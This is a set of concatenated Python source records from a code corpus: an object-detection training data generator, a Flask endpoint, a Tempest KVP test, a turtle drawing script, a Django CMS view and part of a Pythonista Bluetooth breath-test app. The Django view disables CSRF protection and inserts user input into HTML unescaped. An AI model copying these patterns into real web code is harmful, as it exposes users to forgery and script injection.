self.notes = values['notes']\n self.name = values['name']\n\n def toDict(self):\n d = Npc.toDict(self)\n d['name'] = self.name\n d['campaign'] = self.campaign\n d['notes'] = self.notes\n return d\n","sub_path":"app/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":13073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"25900819","text":"import random\n\nimport cv2\nimport numpy as np\n\n\n# image resize\nfrom keras.applications import imagenet_utils\nfrom .kitti_parser import KittiParser\nfrom .hyper_params import H\n\n\ndef process_image(file_path):\n x_img = cv2.imread(file_path)\n if x_img is None:\n print(\"error: reading image {} failed.\".format(file_path))\n return None, None, None, None, None\n\n h, w = x_img.shape[:2]\n resized_w, resized_h = get_new_img_size(w, h, img_min_side=H.min_img_width)\n\n # prepare X\n x_img = cv2.resize(x_img, (resized_w, resized_h))\n x_img = cv2.cvtColor(x_img, cv2.COLOR_BGR2RGB)\n x_img = np.expand_dims(x_img, axis=0)\n x_img = imagenet_utils.preprocess_input(x_img, mode='tf')\n return x_img, w, h, resized_w, resized_h\n\n\ndef gen_anchor_map(output_width, output_height, resized_width, resized_height, rpn_regr):\n \"\"\"\n calculate the anchor cx, cy, w, h\n :param output_width:\n :param output_height:\n :param resized_width:\n :param resized_height:\n :return:\n \"\"\"\n anchor_sizes = H.anchor_box_scales\n anchor_ratios = H.anchor_box_ratios\n num_anchor = H.num_anchor\n\n # store the anchor cx, cy, w, h\n M = np.zeros((4, output_height, output_width, num_anchor))\n current_layer = 0\n for idx_anchor_size, anchor_size in enumerate(anchor_sizes):\n for idx_anchor_ratio, anchor_ratio in enumerate(anchor_ratios):\n anchor_w = anchor_size * anchor_ratio[0]\n anchor_h = anchor_size * anchor_ratio[1]\n\n X, Y = np.meshgrid(np.arange(output_width), np.arange(output_height))\n M[0, :, :, current_layer] = (X + 0.5) * H.down_scale - anchor_w / 2. # xmin\n M[1, :, :, current_layer] = (Y + 0.5) * H.down_scale - anchor_h / 2. 
# ymin\n M[2, :, :, current_layer] = anchor_w\n M[3, :, :, current_layer] = anchor_h\n\n M[0, :, :, current_layer] = np.maximum(0, M[0, :, :, current_layer])\n M[1, :, :, current_layer] = np.maximum(0, M[1, :, :, current_layer])\n\n current_layer += 1\n # idx_anchor = idx_anchor_size * len(anchor_ratios) + idx_anchor_ratio\n #\n # for fx in range(output_width):\n # # self.down_scale * (fx + 0.5) is the center_x of the anchor box\n # anchor_xmin = H.down_scale * (fx + 0.5) - anchor_w / 2\n # anchor_xmax = H.down_scale * (fx + 0.5) + anchor_w / 2\n #\n # # anchor xmin or xmax exceeds the image\n # if anchor_xmin < 0 or anchor_xmax > resized_width:\n # continue\n # for fy in range(output_height):\n # anchor_ymin = H.down_scale * (fy + 0.5) - anchor_h / 2\n # anchor_ymax = H.down_scale * (fy + 0.5) + anchor_h / 2\n #\n # if anchor_ymin < 0 or anchor_ymax > resized_height:\n # continue\n #\n # anchor_cx = (anchor_xmin + anchor_xmax) / 2.0\n # anchor_cy = (anchor_ymin + anchor_ymax) / 2.0\n # M[0, fy, fx, start:start + 4] = [anchor_cx, anchor_cy, anchor_w, anchor_h]\n return M\n\n\ndef get_new_img_size(width, height, img_min_side):\n if width <= height:\n f = float(img_min_side) / width\n resized_height = int(f * height)\n resized_width = int(img_min_side)\n else:\n f = float(img_min_side) / height\n resized_width = int(f * width)\n resized_height = int(img_min_side)\n\n return resized_width, resized_height\n\n\n# Intersection of Union\ndef iou(a, b):\n # a and b should be (x1,y1,x2,y2)\n\n if a[0] >= a[2] or a[1] >= a[3] or b[0] >= b[2] or b[1] >= b[3]:\n return 0.0\n\n area_i = intersection(a, b)\n area_u = union(a, b, area_i)\n\n return float(area_i) / float(area_u + 1e-6)\n\n\ndef union(au, bu, area_intersection):\n area_a = (au[2] - au[0]) * (au[3] - au[1])\n area_b = (bu[2] - bu[0]) * (bu[3] - bu[1])\n area_union = area_a + area_b - area_intersection\n return area_union\n\n\ndef intersection(ai, bi):\n x = max(ai[0], bi[0])\n y = max(ai[1], bi[1])\n w = min(ai[2], bi[2]) - x\n h = min(ai[3], bi[3]) - y\n if w < 0 or h < 0:\n return 0\n return w * h\n\n\nclass TrainDataGenerator(object):\n\n def __init__(self, data_dir, annotation_format='kitti'):\n self.annotation_data = None\n if 'kitti' == annotation_format:\n annotation_parser = KittiParser(data_dir)\n self.annotation_data = annotation_parser.get_annotations()\n\n if self.annotation_data is None:\n raise ValueError('missing annotation')\n\n def get_train_datagen(self):\n while True:\n # shuffle it in every epoch\n random.shuffle(self.annotation_data)\n\n # ensure every image is used for training at least once.\n for img_data in self.annotation_data:\n file_path = img_data.get('file_path')\n\n x_img, w, h, resized_w, resized_h = process_image(file_path)\n if x_img is None:\n print(\"error: reading image {} failed.\".format(file_path))\n continue\n\n # prepare Y\n # now calculates the rpn gt cls and regression box\n y_rpn_cls, y_rpn_regr = self.calc_rpn_gt(resized_w, resized_h, w, h, img_data['bboxes'])\n\n # scaling the regression target, i don't know why TODO\n y_rpn_regr[:, y_rpn_regr.shape[1]//2:, :, :] *= H.std_scaling\n\n # change shape to NWHC format\n y_rpn_cls = np.transpose(y_rpn_cls, (0, 2, 3, 1))\n y_rpn_regr = np.transpose(y_rpn_regr, (0, 2, 3, 1))\n\n yield x_img, [y_rpn_cls, y_rpn_regr]\n\n def calc_rpn_gt(self, resized_width, resized_height, w, h, gt_bboxes,\n rpn_min_overlap=H.rpn_min_overlap, rpn_max_overlap=H.rpn_max_overlap, num_region=H.rpn_num_regions):\n anchor_sizes = H.anchor_box_scales\n anchor_ratios = 
H.anchor_box_ratios\n num_anchors = len(anchor_sizes) * len(anchor_ratios)\n\n output_width, output_height = int(resized_width / H.down_scale), int(resized_height / H.down_scale)\n\n num_bbox = len(gt_bboxes)\n gta = np.zeros((num_bbox, 4)) # store the gt bboxes\n for idx, bbox in enumerate(gt_bboxes):\n gta[idx, 0] = bbox['xmin'] * (resized_width / float(w))\n gta[idx, 1] = bbox['xmax'] * (resized_width / float(w))\n gta[idx, 2] = bbox['ymin'] * (resized_height / float(h))\n gta[idx, 3] = bbox['ymax'] * (resized_height / float(h))\n\n # from anchor perspective\n y_rpn_overlap = np.zeros((output_height, output_width, num_anchors)) # 记录iou?\n y_is_box_valid = np.zeros((output_height, output_width, num_anchors)) # objectness?\n y_rpn_regr = np.zeros((output_height, output_width, num_anchors * 4)) # anchor bbox\n\n # from the gt bbox perspective.\n bbox_num_pos_anchors = np.zeros(num_bbox).astype(int)\n best_anchor_for_bbox = -1 * np.ones((num_bbox, 4)).astype(int)\n best_iou_for_bbox = np.zeros(num_bbox).astype(np.float32)\n best_x_for_bbox = np.zeros((num_bbox, 4)).astype(int)\n best_dx_for_bbox = np.zeros((num_bbox, 4)).astype(np.float32)\n\n # step 1:\n # for all the feature map locations, calculates its iou with the gt boxes, and determine its training target\n # i.e. whether it should predict an object or background\n for idx_anchor_size, anchor_size in enumerate(anchor_sizes):\n for idx_anchor_ratio, anchor_ratio in enumerate(anchor_ratios):\n anchor_w = anchor_size * anchor_ratio[0]\n anchor_h = anchor_size * anchor_ratio[1]\n\n for fx in range(output_width):\n # self.down_scale * (fx + 0.5) is the center_x of the anchor box\n anchor_xmin = H.down_scale * (fx + 0.5) - anchor_w / 2\n anchor_xmax = H.down_scale * (fx + 0.5) + anchor_w / 2\n\n # anchor xmin or xmax exceeds the image\n if anchor_xmin < 0 or anchor_xmax > resized_width:\n continue\n for fy in range(output_height):\n anchor_ymin = H.down_scale * (fy + 0.5) - anchor_h / 2\n anchor_ymax = H.down_scale * (fy + 0.5) + anchor_h / 2\n\n if anchor_ymin < 0 or anchor_ymax > resized_height:\n continue\n\n # this is the best IOU for the (x,y) coord and the current anchor\n # note that this is different from the best IOU for a GT bbox\n best_iou_for_current_location = 0.0\n best_regr = [0.0] * 4\n # now we get the anchor coordinate, let's calculate the IOU\n anchor_type = 'neg'\n for idx_bbox in range(len(gt_bboxes)):\n gt_xmin, gt_xmax, gt_ymin, gt_ymax = gta[idx_bbox, 0], gta[idx_bbox, 1], gta[idx_bbox, 2], \\\n gta[idx_bbox, 3]\n\n # the iou between the current anchor and the gt box\n current_iou = iou([gt_xmin, gt_ymin, gt_xmax, gt_ymax],\n [anchor_xmin, anchor_ymin, anchor_xmax, anchor_ymax])\n\n # find a good match anchor box\n if current_iou > best_iou_for_bbox[idx_bbox] or current_iou > rpn_max_overlap:\n # calculate the deltas\n gt_cx = (gt_xmin + gt_xmax) / 2.0\n gt_cy = (gt_ymin + gt_ymax) / 2.0\n anchor_cx = (anchor_xmin + anchor_xmax) / 2.0\n anchor_cy = (anchor_ymin + anchor_ymax) / 2.0\n\n delta_cx = (gt_cx - anchor_cx) / anchor_w\n delta_cy = (gt_cy - anchor_cy) / anchor_h\n\n delta_w = np.log((gt_xmax - gt_xmin) / anchor_w)\n delta_h = np.log((gt_ymax - gt_ymin) / anchor_h)\n\n # setting the gt box related variables\n # each GT boxes should be mapped to an anchor box,\n # so we keep track of which anchor box was best\n if current_iou > best_iou_for_bbox[idx_bbox]:\n best_anchor_for_bbox[idx_bbox, :] = [fy, fx, idx_anchor_ratio, idx_anchor_size]\n best_iou_for_bbox[idx_bbox] = current_iou\n best_x_for_bbox[idx_bbox, :] 
= [anchor_xmin, anchor_xmax, gt_xmin, gt_xmax]\n best_dx_for_bbox[idx_bbox, :] = [delta_cx, delta_cy, delta_w, delta_h]\n\n if current_iou > rpn_max_overlap:\n bbox_num_pos_anchors[idx_bbox] += 1\n anchor_type = 'pos'\n\n if current_iou > best_iou_for_current_location:\n best_iou_for_current_location = current_iou\n best_regr = [delta_cx, delta_cy, delta_w, delta_h]\n\n if rpn_min_overlap < current_iou < rpn_max_overlap:\n # gray zone between neg and pos\n if anchor_type != 'pos':\n anchor_type = 'neutral'\n\n # now all the gt_boxes have been processed for one anchor location\n idx_anchor = idx_anchor_size * len(anchor_ratios) + idx_anchor_ratio\n if anchor_type == 'neg':\n y_is_box_valid[fy, fx, idx_anchor] = 1\n y_rpn_overlap[fy, fx, idx_anchor] = 0\n elif anchor_type == 'neutral':\n y_is_box_valid[fy, fx, idx_anchor] = 0\n y_rpn_overlap[fy, fx, idx_anchor] = 0\n elif anchor_type == 'pos':\n y_is_box_valid[fy, fx, idx_anchor] = 1\n y_rpn_overlap[fy, fx, idx_anchor] = 1\n start = 4 * idx_anchor\n y_rpn_regr[fy, fx, start:start + 4] = best_regr\n\n # we processed all the locations, check if any bbox has no anchor covered\n for idx in range(num_bbox):\n if bbox_num_pos_anchors[idx] == 0:\n if best_anchor_for_bbox[idx, 0] == -1:\n print('Warning: no overlap anchor for bbox {}'.format(idx))\n continue\n\n second_best_anchor_for_bbox = best_anchor_for_bbox[idx]\n fy = second_best_anchor_for_bbox[0],\n fx = second_best_anchor_for_bbox[1],\n idx_anchor_ratio = second_best_anchor_for_bbox[2],\n idx_anchor_size = second_best_anchor_for_bbox[3]\n\n idx_anchor = len(anchor_ratios) * idx_anchor_size + idx_anchor_ratio\n y_is_box_valid[fy, fx, idx_anchor] = 1\n y_rpn_overlap[fy, fx, idx_anchor] = 1\n start = 4 * idx_anchor\n y_rpn_regr[fy, fx, start:start + 4] = best_dx_for_bbox[idx, :]\n\n # now - each location has been marked and each bbox has been associated with an anchor\n # next, we will select a few negative sample ans the positive samples to form mini batch training samples\n # move the anchor-axis to the first dimension\n y_rpn_overlap = np.transpose(y_rpn_overlap, (2, 0, 1))\n y_rpn_overlap = np.expand_dims(y_rpn_overlap, axis=0) # 0-dimension is the batch dimension\n\n y_is_box_valid = np.transpose(y_is_box_valid, (2, 0, 1))\n y_is_box_valid = np.expand_dims(y_is_box_valid, axis=0)\n\n y_rpn_regr = np.transpose(y_rpn_regr, (2, 0, 1))\n y_rpn_regr = np.expand_dims(y_rpn_regr, axis=0)\n\n # return 3 sub arrays, the indexes of the element meet the condition\n pos_locs = np.where(np.logical_and(y_rpn_overlap[0, :, :, :] == 1, y_is_box_valid[0, :, :, :] == 1))\n neg_locs = np.where(np.logical_and(y_rpn_overlap[0, :, :, :] == 0, y_is_box_valid[0, :, :, :] == 1))\n\n num_positive_locs = len(pos_locs[0])\n num_negative_locs = len(neg_locs[0])\n\n # mute some positive box\n if num_positive_locs > num_region / 2:\n val_locs = random.sample(num_positive_locs, num_positive_locs - num_region / 2)\n y_is_box_valid[0, pos_locs[0][val_locs], pos_locs[1][val_locs], pos_locs[2][val_locs]] = 0\n num_positive_locs = num_region / 2\n\n # has more negative locations, then mute some negative anchors\n if num_negative_locs + num_positive_locs > num_region:\n val_locs = random.sample(range(num_negative_locs), num_negative_locs - num_positive_locs) # neg:pos = 1:1\n y_is_box_valid[0, neg_locs[0][val_locs], neg_locs[1][val_locs], neg_locs[2][val_locs]] = 0\n\n # y_rpn_cls shape: (1, 18, rows, cols), 1st dimension: is_box_valid, y_rpn_overlap for each anchor\n # merge them together, which will be used in computing 
loss.\n # y_true and y_pred is not 1 vs 1 mapping\n y_rpn_cls = np.concatenate([y_is_box_valid, y_rpn_overlap], axis=1)\n\n # y_rpn_regr shape: (1, 72, rows, cols)?\n y_rpn_regr = np.concatenate([np.repeat(y_rpn_overlap, 4, axis=1), y_rpn_regr], axis=1)\n\n return np.copy(y_rpn_cls), np.copy(y_rpn_regr)\n\n","sub_path":"frcnn/datagen.py","file_name":"datagen.py","file_ext":"py","file_size_in_byte":15827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"350769733","text":"from flask import Flask\nimport openpyxl as px\nimport pandas as pd\nimport itertools as it\nfrom flask import request\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n args = request.args\n county = request.args.getlist('county')\n print(county)\n data = getData(county[0])\n return data.to_json()\n\ndef getData(county):\n print(county)\n wb = px.load_workbook('EARS_sample_index_dataset.xlsx')\n ws = wb['payout_monitoring_2016']\n data = ws.values\n cols = next(data)[1:]\n data = list(data)\n idx = [r[0] for r in data]\n data = (it.islice(r, 1, None) for r in data)\n df = pd.DataFrame(data, index=idx, columns=cols)\n df = df[df.index == county]\n output = df.PAYOUT\n return output\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"swissre/checkDrought/checkDrought.py","file_name":"checkDrought.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"147187641","text":"# Copyright 2014 Cloudbase Solutions Srl\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tempest import config\nfrom oslo_log import log as logging\nfrom tempest.lis import manager\nfrom tempest.scenario import utils as test_utils\nfrom tempest import test\n\nCONF = config.CONF\n\nLOG = logging.getLogger(__name__)\n\n\nclass KVP(manager.LisBase):\n\n def setUp(self):\n super(KVP, self).setUp()\n # Setup image and flavor the test instance\n # Support both configured and injected values\n if not hasattr(self, 'image_ref'):\n self.image_ref = CONF.compute.image_ref\n if not hasattr(self, 'flavor_ref'):\n self.flavor_ref = CONF.compute.flavor_ref\n self.image_utils = test_utils.ImageUtils(self.manager)\n if not self.image_utils.is_flavor_enough(self.flavor_ref,\n self.image_ref):\n raise self.skipException(\n '{image} does not fit in {flavor}'.format(\n image=self.image_ref, flavor=self.flavor_ref\n )\n )\n self.host_name = \"\"\n self.instance_name = \"\"\n self.daemon = \"'[h]v_kvp_daemon\\|[h]ypervkvpd'\"\n self.run_ssh = CONF.validation.run_validation and \\\n self.image_utils.is_sshable_image(self.image_ref)\n self.ssh_user = CONF.validation.image_ssh_user\n LOG.debug('Starting test for i:{image}, f:{flavor}. 
'\n 'Run ssh: {ssh}, user: {ssh_user}'.format(\n image=self.image_ref, flavor=self.flavor_ref,\n ssh=self.run_ssh, ssh_user=self.ssh_user))\n\n @test.attr(type=['smoke', 'core', 'kvp'])\n @test.services('compute', 'network')\n def test_kvp_basic(self):\n self.spawn_vm()\n self._initiate_linux_client(self.floating_ip['floatingip']['floating_ip_address'],\n self.ssh_user, self.keypair['private_key'])\n self.verify_lis_status(self.instance_name, \"'Key-Value Pair Exchange'\")\n \"\"\" Check if KVP runs on the vm \"\"\"\n try:\n output = self.linux_client.verify_daemon(self.daemon)\n LOG.info('KVP daemon is running ${0}'.format(output))\n self.assertIsNotNone(output)\n except Exception:\n LOG.exception('KVP daemon ' + self.daemon + ' is not running!')\n self._log_console_output()\n raise\n self.check_kvp_basic(self.instance_name)\n self.servers_client.delete_server(self.instance['id'])\n\n @test.attr(type=['smoke', 'core', 'kvp'])\n @test.services('compute', 'network')\n def test_kvp_Key_Values(self):\n self.spawn_vm()\n self._initiate_linux_client(self.floating_ip['floatingip']['floating_ip_address'],\n self.ssh_user, self.keypair['private_key'])\n self.verify_lis_status(self.instance_name, \"'Key-Value Pair Exchange'\")\n self.send_kvp_client()\n self.kvp_add_value(self.instance_name, 'EEE', '555', '0')\n self.linux_client.kvp_verify_value('EEE', '555', '0')\n self.kvp_modify_value(self.instance_name, 'EEE', '999', '0')\n self.linux_client.kvp_verify_value('EEE', '999', '0')\n self.kvp_remove_value(self.instance_name, 'EEE', '999', '0')\n self.servers_client.delete_server(self.instance['id'])\n","sub_path":"tempest/lis/core/test_kvp.py","file_name":"test_kvp.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"232657091","text":"\"\"\"\n Author: Chris Johnson, cxj9051\n\"\"\"\n\nfrom turtle import *\n\n\ndef initiate():\n \"\"\"\n Pre-Conditions: The pen is down, facing east, at the position 300, 300.\n The initiate function makes the turtle move faster and sets the screen to the dimensions 600, 600. It also puts the turtle in the middle of the screen.\n Post-Conditions: The pen is down, facing east, at the position 300, 300.\n \"\"\"\n speed(0)\n setup(width=600, height=600, startx=300, starty=300)\n\ndef main():\n \"\"\"\n Pre-Conditions: The pen is down, facing east, at the position 300, 300.\n The main function calls the initiate function, prompts the user for the depth, then passes on the depth and size to the drawJester function.\n Once the drawJester function is done, it closes exits the program\n Post-Conditions: The pen is down, facing east, at the position 300, 300.\n \"\"\"\n initiate()\n depth = int(input(\"What would you like the depth to be? \"))\n size = 100\n drawJester(depth, size)\n input(\"Press enter to continue \")\n bye()\n\ndef drawJester(depth, size):\n \"\"\"\n Pre-Conditions: The pen is down, facing east, at the position 300, 300.\n The turtle then draws squares recursively where the amount of squares drawn is defined by the depth variable. 
Once the squares are drawn, circles are drawn at the corners of the last squares.\n Post-Conditions: The pen is down, facing east, at the position 300, 300.\n \"\"\"\n if depth % 2 == 0:\n color(\"red\")\n else:\n color(\"green\")\n if depth == 0:\n circle(size / 2)\n else:\n fd(size / 2)\n left(90)\n fd(size)\n right(135)\n drawJester(depth - 1, size / 2)\n if depth % 2 == 0:\n color(\"red\")\n else:\n color(\"green\")\n left(225)\n fd(size)\n right(135)\n drawJester(depth - 1, size / 2)\n if depth % 2 == 0:\n color(\"red\")\n else:\n color(\"green\")\n left(225)\n fd(size)\n left(90)\n fd(size / 2)\n\n \n \n \n\n\nmain()\n","sub_path":"Homeworks/jester.py","file_name":"jester.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"415055536","text":"from django.shortcuts import render\nfrom django.http import HttpResponseNotFound, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Pages\n\n# we create the form separately\n#https://www.w3schools.com/tags/att_form_method.asp\nFORMULARIO = \"\"\"\n\t<form action=\"\" method=\"post\">\n\tURL: <input type=\"text\" name=\"pages\"><br>\n\tFirst name: <input type=\"text\" name=\"name\"><br>\n\tLast name: <input type=\"text\" name=\"last_name\"><br>\n\t<input type=\"submit\" value=\"Submit\">\n\t</form>\n\"\"\"\ndef pages (request,num):\n\n\ttry:\n\t\tpage = Pages.objects.get(id = str(num))\t\n\texcept Pages.DoesNotExist:\n\t\treturn HttpResponseNotFound('<html><body><h1>' + num + ' not found</h1></body></html>')\n\treturn HttpResponse(page.name + str(page.page))\n\t\n@csrf_exempt\ndef barra (request):\n\n\tif request.method == \"POST\":\n\t\tpage = Pages (name = request.POST['name'], page = request.POST['pages'])\n\t\tpage.save()\n\tlista = Pages.objects.all()\n\trespuesta = \"\"\n\t\n\t# if request.user.is_authenticated():\n # print(\"Logged in\")\n #else:\n # print(\"Not logged in\")\n\t\n\tif request.user.is_authenticated():\n\t#https://stackoverflow.com/questions/12209438/logout-button-php/12209491\n\t\tlogged = 'Logged in ' + request.user.username + ' <a href=\"/logout\">Logout</a>'\n\t\trespuesta = '<html><body>' + logged + FORMULARIO + \"<hr>\" + respuesta + \"</body></html>\"\n\telse:\n\t#https://www.quora.com/How-does-one-link-login-php-and-register-php-in-index-phps-html-code\n\t\tlogged = 'Not logged in <a href=\"/login\">Login</a>'\n\t\trespuesta = '<html><body>' + logged + \"<hr>\" + respuesta + \"</body></html>
\"\n\treturn HttpResponse(respuesta)\n","sub_path":"myproject/cms_user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"355050006","text":"DEBUG = False\n\n## Python imports\nimport os\nimport requests\nimport shutil\nimport numpy as np\nfrom io import BytesIO\nimport datetime as datetime\nimport time\nfrom pytz import timezone\nimport json\nimport threading\nimport fnmatch\nimport pprint\nimport math\nfrom functools import partial\nimport itertools\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import num2date, date2num, num2epoch\n\n# Pythonista imports\nimport ui\nimport Image\nimport console\nfrom objc_util import on_main_thread\nimport scene\n\n\n# Metre imports\nimport process_test\nfrom ble_file_uploader import BleUploader\nfrom lib.UISummaryDelegate import SummaryDelegate\nfrom lib.UIBleDelegate import BleDelegate, BokehDelegate, loading_html, updating_html, nolog_html, getPlot\nfrom lib.UIHelpDelegate import HelpDelegate\nfrom lib.UIFeatures import ConsoleAlert\nfrom lib.UITableDelegate import ResultsTable\nfrom app_single_launch import AppSingleLaunch\n\n# Using single launch lock as suggested in\n# https://forum.omz-software.com/topic/5440/prevent-duplicate-launch-from-shortcut/7\n\nAPP_VERSION = 'v0.23'\n\n\n\nclass MainView(ui.View):\n def __init__(self):\n #def __init__(self, app: AppSingleLaunch):\n #self.app = app\n self.name = \"MetreAce Home\"\n self.flex = 'WH'\n #self.tint_color = '#494949'\n if DEBUG:\n print('Screen size')\n print(scene.get_screen_size())\n self.view_x = scene.get_screen_size()[0]\n self.view_y = scene.get_screen_size()[1]\n \n\n \n # Setup of UI Features\n \n self.v = ui.load_view('mainview')\n self.v.frame = self.bounds\n self.v.flex = 'WH'\n \n self.xscaler = self.view_x/320\n self.yscaler = self.view_y/480\n\n \n # Console\n self.app_console = self.v['console']\n self.app_console.alpha = 0\n #self.orig_console_loc = self.app_console.y\n \n # Ble connection\n self.star_button = self.v['start_button']\n self.ble_icon = self.v['ble_icon']\n self.ble_status_icon = self.v['ble_status_icon']\n self.ble_status = self.v['ble_status']\n self.connect_button = self.v['connect_button']\n ble_icon_path = 'images/ble_off.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n \n # Set up icons\n self.instr_icon = self.v['imageview']\n dev_icon_path = 'images/MetreAceDev.png'\n self.instr_icon.image = ui.Image.named(dev_icon_path)\n self.calc_icon = self.v['button1']\n\n # Instr chevrons\n self.d0 = self.v['dot0']\n self.d1 = self.v['dot1']\n self.d2 = self.v['dot2']\n self.d3 = self.v['dot3']\n self.d4 = self.v['dot4'] \n \n # Cloud chevrons\n self.d5 = self.v['dot5']\n self.d6 = self.v['dot6']\n self.d7 = self.v['dot7']\n self.d8 = self.v['dot8']\n self.d9 = self.v['dot9']\n \n # Version label\n self.vlabel = self.v['vlabel']\n self.vlabel.text = APP_VERSION\n \n #Center app title based on bounds\n M_w =self.v['etre'].x - self.v['M'].x\n etre_w = self.v['A'].x - self.v['etre'].x\n A_w = self.v['ce'].x - self.v['A'].x\n \n self.v['etre'].x = self.star_button.x * self.xscaler + M_w * self.xscaler\n self.v['M'].x = self.v['etre'].x - M_w\n self.v['A'].x = self.v['etre'].x + etre_w \n self.v['ce'].x = self.v['A'].x + A_w\n \n # Setup\n self.cwd = os.getcwd()\n on_main_thread(console.set_idle_timer_disabled)(True)\n \n \n root_dir, metre_dir = self.cwd.split('MetreiOS')\n if DEBUG:\n print('This is self.cwd: ' + 
self.cwd)\n print('This is root_dir: ' + root_dir)\n \n # Download Single Launch Lock if it's not already installed\n check_path = root_dir + 'site-packages/single_launch.lock'\n if os.path.exists(check_path):\n if DEBUG:\n print('single_launch.lock already exists')\n else:\n print('')\n else:\n shutil.copy(self.cwd + '/resources/single_launch.lock', check_path )\n if DEBUG:\n print('moved copy of single_launch.lock')\n else:\n print('')\n\n\n # Set up UI Functions\n self.getData()\n self.results_table = self.v['results_table']\n self.orig_results_table_loc = self.results_table.y\n\n if self.xscaler > 2:\n self.results_table.width = self.results_table.width/(self.xscaler/2)\n self.results_table.x = self.star_button.x/2 + self.results_table.width/(4*2) - self.star_button.width/8\n\n self.restable_inst = ResultsTable(self.v, self.results_table, self.xscaler, self.yscaler, self.cwd)\n self.add_subview(self.v)\n \n # Implementation of navigation view/mainview\n self.l = self.create_l_buttonItems('Settings','|','Results','|', 'Help')\n self.left_button_items = self.l\n self.files_to_upload = os.listdir(self.cwd + '/data_files/converted_files/')\n\n # Process pre-uploaded tests (if available)\n\n \n def init_check(self):\n if DEBUG:\n print(\"this is the size of files to upload\")\n print(len(self.files_to_upload))\n if len(self.files_to_upload) >=2: \n \n self.app_console.text = 'Beginning Upload'\n self.main()\n self.star_button.alpha = 0.5\n self.ble_status.text = ''\n else:\n self.ble_status.text = 'Ready to Connect'\n self.bleStatus()\n \n def will_close(self) -> None:\n self.app.will_close()\n\n # This sets up main navigation view\n\n def button_nav(self, sender):\n def connect(a,b):\n \n if sender.title == a:\n view_to_push = b\n pushed_view = ui.load_view(view_to_push)\n self.v.navigation_view.push_view(pushed_view)\n \n if sender.title=='Settings':\n settings_page = pushed_view['view1']\n d_table = settings_page['dt_table']\n ble_delegate = BleDelegate(settings_page, d_table, self.cwd)\n \n if sender.title=='Results':\n results_page = pushed_view['bokeh_bg']\n bview = ui.load_view('bokehview') \n bokeh_delegate = BokehDelegate(pushed_view['webview1'], self.cwd)\n\n if sender.title =='Help':\n help_page = pushed_view['toolbarview']\n hview = ui.load_view('toolbar')\n inst_page = pushed_view['online_instructions']\n qa_page = pushed_view['online_qa']\n recover_page = pushed_view['recover_button']\n help_delegate = HelpDelegate(hview, inst_page, qa_page, recover_page)\n\n \n connect('Settings','file_view')\n connect('Help','toolbar')\n connect('Results','bokehview')\n\n\n def create_l_buttonItems(self, *buttons):\n items=[]\n for b in buttons:\n b=ui.ButtonItem(b)\n b.tint_color='#494949'\n b.action= self.button_nav\n items.append(b)\n return items\n\n# This sets up the bluetooth upload\n @ui.in_background\n def bleStatus(self):\n self.star_button.alpha = 0.5\n loaded = False\n self.connect_button.alpha = 0\n ble_icon_path = 'images/ble_disconnected.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n \n if not loaded:\n self.ble_status.text= 'Ready to Connect'\n ble_file_uploader = BleUploader(self.app_console, self.ble_status_icon, self.v, self.xscaler, self.yscaler, APP_VERSION, DEBUG)\n ready_status, orig_table_loc = ble_file_uploader.execute_transfer()\n self.orig_results_table_loc = orig_table_loc\n \n if ready_status:\n done = True\n #self.star_button.alpha = 0.25\n self.ble_status.text = ''\n\n # HERE is where you trigger the main function (i.e. 
after the button is pushed)\n self.calc_icon.alpha = 0.7\n \n self.main(direct = False)\n #self.connect_button.alpha = 0.7\n #self.star_button.alpha = 0.7\n return done\n else:\n self.app_console.text = 'No breath tests are ready to be processed'\n if ble_file_uploader.py_ble_uart.peripheral:\n ble_file_uploader.py_ble_uart.peripheral = False\n self.ble_icon_path = 'images/ble_off.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n self.ble_status.text= 'Ready to Connect'\n self.star_button.alpha = 0.7\n self.connect_button.action = self.bleStatus()\n else:\n if DEBUG:\n print(\"UI senses it is disconnected\")\n time.sleep(0.5)\n self.app_console.text = 'Bluetooth connection lost. Reinsert mouthpiece to try again'\n ble_icon_path = 'images/ble_off.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n self.ble_status_icon.background_color = 'black'\n self.ble_status.text= 'Ready to Connect'\n self.star_button.alpha = 0.7\n self.connect_button.action = self.bleStatus()\n \n ### THIS IS WHERE YOU SHOULD GIVE THE OPTION TO CONNECT AGAIN\n self.d0.alpha = 0 \n self.d1.alpha = 0\n self.d2.alpha = 0\n self.d3.alpha = 0\n self.d4.alpha = 0 \n self.d5.alpha = 0 \n self.d6.alpha = 0\n self.d7.alpha = 0\n self.d8.alpha = 0\n self.d9.alpha = 0\n self.instr_icon.alpha = 0.1\n self.connect_button.action = self.bleStatus()\n self.connect_button.alpha =1\n # if self.app_console.y != self.orig_console_loc:\n # self.app_console.y = self.orig_console_loc\n\n \n else:\n self.ble_icon_path = 'images/ble_disconnected.png'\n ble_icon.image = ui.Image.named(ble_icon_path)\n # if self.app_console.y != self.orig_console_loc:\n # self.app_console.y = self.orig_console_loc\n return done\n \n \n \n def getData(self):\n \n with open(self.cwd + 